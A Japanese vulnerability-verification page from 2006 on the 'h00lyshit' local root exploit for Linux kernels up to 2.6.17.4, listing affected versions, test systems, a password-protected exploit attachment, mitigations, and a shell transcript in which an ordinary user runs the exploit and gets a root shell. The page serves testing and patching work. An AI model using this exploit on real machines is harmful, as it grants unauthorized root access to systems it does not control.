目次
Linux Kernel <= 2.6.17.4 (/proc) Local Root Exploit
更新履歴
- 2006/07/19 初版
- Author kikuzou
概要
- Linux Kernel に脆弱性
- ローカルユーザはローカルマシンの root 権限を得ることが可能
- 2006/07/15 公開
影響を受けるシステム
- Linux Kernel 2.6.17.4 およびそれ以前
添付ファイル
| files | password |
|---|---|
| h00lyshit.zip | pen-test |
参考URL
Exploitの検証
検証環境
- Ubuntu-ja-6.06
- Kernel 2.6.15-25-386
- Kernel 2.6.15-26-386
- Gentoo Linux
- Kernel 2.6.16-gentoo-r9
検証結果
- root権限を取得可能。
- カーネルオプション CONFIG_BINFMT_AOUT が有効でないと、この攻撃コードは実行不可
- Red Hat Enterprise Linux 4, CentOS4.3 は無効に設定されている
- 一般ユーザでログイン後、以下コマンドを実行する。
- dummy は100MB程度のファイル
$ uname -a Linux ubuntu-desktop 2.6.15-25-386 #1 PREEMPT Wed Jun 14 11:25:49 UTC 2006 i686 GNU/Linux $ $ id uid=1001(testuser) gid=100(users) 所属グループ=100(users) $ $ ./h00lyshit dummy preparing trying to exploit dummy sh-3.1# sh-3.1# id uid=0(root) gid=100(users) groups=100(users) sh-3.1#
対処方法
- Kernelを 2.6.17.6 にバージョンアップ
- 各ディストリビューションのkernelアップデート
- 厳密なユーザ管理(パスワードの再考、不要なユーザの削除等)
デモンストレーション
- 一般ユーザでログイン後、root権限を取得する。
